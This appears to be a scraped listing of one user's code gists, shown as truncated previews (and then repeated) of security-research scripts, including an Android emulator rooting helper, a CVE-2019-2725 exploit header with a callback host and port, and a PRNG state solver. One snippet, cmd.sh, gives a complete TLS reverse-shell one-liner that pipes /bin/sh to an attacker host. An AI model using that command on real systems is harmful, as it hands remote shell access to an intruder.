guillaume teissier gteissier

## root-my-emulator.py
import gdb
import re

from collections import namedtuple

DETAILS = {
    # API 24 playstore
    # API 25 playstore
    '3.10.0+': (0xC0887D20, 0xC092138C, 316, 0xC0A7754C, 4),
    # API 26 playstore

## socks2sapni.py
#!/usr/bin/env python3

import logging
import select
import socket
import struct
from socketserver import ThreadingMixIn, TCPServer, StreamRequestHandler

logging.basicConfig(level=logging.DEBUG)
SOCKS_VERSION = 5

## tcpdump.py
#!/usr/bin/env python

'''
It has been tested with either py2 or py3.
Beware ancient versions of Linux kernel which may not support SOCK_NONBLOCK
or the memory mapped ring buffer.

BPF filter listed below is compiled form of "not port 22"
if you want to change it, do something like

## compute-internal-state.py
#!/usr/bin/env python

import z3
import sys

# glibc default PRNG
# it is called TYPE_3, and is an additive recursive generator
# its internal state is made of 31 32-bits integers
# r_0 ... r_30
# each call to random will modify the internal state

## pygrep.py
#!/usr/bin/env python

import os
import re
import zipfile
from cStringIO import StringIO

def process_file(f):
  data = f.read()
  for m in re.finditer(r'(FLAG[0-9a-zA-Z/+=]+)', data):

## cve-2019-2725.py
#!/usr/bin/env python

import requests
import sys
from base64 import b64encode


LHOST = '172.16.89.1'
LPORT = 8888

## asciinema_rebase.py
#!/usr/bin/env python

import sys
import json

start_time = None

for line in sys.stdin.readlines():
  o = json.loads(line)
  if type(o) != type([]):

## mass-webshot.py
#!/usr/bin/env python

from selenium import webdriver
import selenium
import sys
import re

def take_screenshot(url, png):
  options = webdriver.ChromeOptions()
  options.add_argument('headless')

## ber.py
from cStringIO import StringIO
from struct import pack
from binascii import unhexlify, hexlify
from itertools import count, dropwhile

VERBOSE = True

class Asn1Obj:
  '''generic frame for ASN1 fields, supports nesting'''
  def __init__(self, klass, constructed, type, indefinite, value=None, children=[], absorbed=None):

## cmd.sh
# attacker side: create auto-signed certificate and setup a listener
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -quiet -key key.pem -cert cert.pem -port 443

# victim side: connect back to attacker using TLS
mkfifo fifo; /bin/sh -i < fifo 2>&1 | openssl s_client -quiet -connect attacker:443 > fifo; rm fifo
	import gdb
	import re

	from collections import namedtuple

	DETAILS = {
	# API 24 playstore
	# API 25 playstore
	'3.10.0+': (0xC0887D20, 0xC092138C, 316, 0xC0A7754C, 4),
	# API 26 playstore
	#!/usr/bin/env python3

	import logging
	import select
	import socket
	import struct
	from socketserver import ThreadingMixIn, TCPServer, StreamRequestHandler

	logging.basicConfig(level=logging.DEBUG)
	SOCKS_VERSION = 5
	#!/usr/bin/env python

	'''
	It has been tested with either py2 or py3.
	Beware ancient versions of Linux kernel which may not support SOCK_NONBLOCK
	or the memory mapped ring buffer.

	BPF filter listed below is compiled form of "not port 22"
	if you want to change it, do something like
	#!/usr/bin/env python

	import z3
	import sys

	# glibc default PRNG
	# it is called TYPE_3, and is an additive recursive generator
	# its internal state is made of 31 32-bits integers
	# r_0 ... r_30
	# each call to random will modify the internal state
	#!/usr/bin/env python

	import os
	import re
	import zipfile
	from cStringIO import StringIO

	def process_file(f):
	data = f.read()
	for m in re.finditer(r'(FLAG[0-9a-zA-Z/+=]+)', data):
	#!/usr/bin/env python

	import requests
	import sys
	from base64 import b64encode


	LHOST = '172.16.89.1'
	LPORT = 8888
	#!/usr/bin/env python

	import sys
	import json

	start_time = None

	for line in sys.stdin.readlines():
	o = json.loads(line)
	if type(o) != type([]):
	#!/usr/bin/env python

	from selenium import webdriver
	import selenium
	import sys
	import re

	def take_screenshot(url, png):
	options = webdriver.ChromeOptions()
	options.add_argument('headless')
	from cStringIO import StringIO
	from struct import pack
	from binascii import unhexlify, hexlify
	from itertools import count, dropwhile

	VERBOSE = True

	class Asn1Obj:
	'''generic frame for ASN1 fields, supports nesting'''
	def __init__(self, klass, constructed, type, indefinite, value=None, children=[], absorbed=None):
	# attacker side: create auto-signed certificate and setup a listener
	openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
	openssl s_server -quiet -key key.pem -cert cert.pem -port 443

	# victim side: connect back to attacker using TLS
	mkfifo fifo; /bin/sh -i < fifo 2>&1 \| openssl s_client -quiet -connect attacker:443 > fifo; rm fifo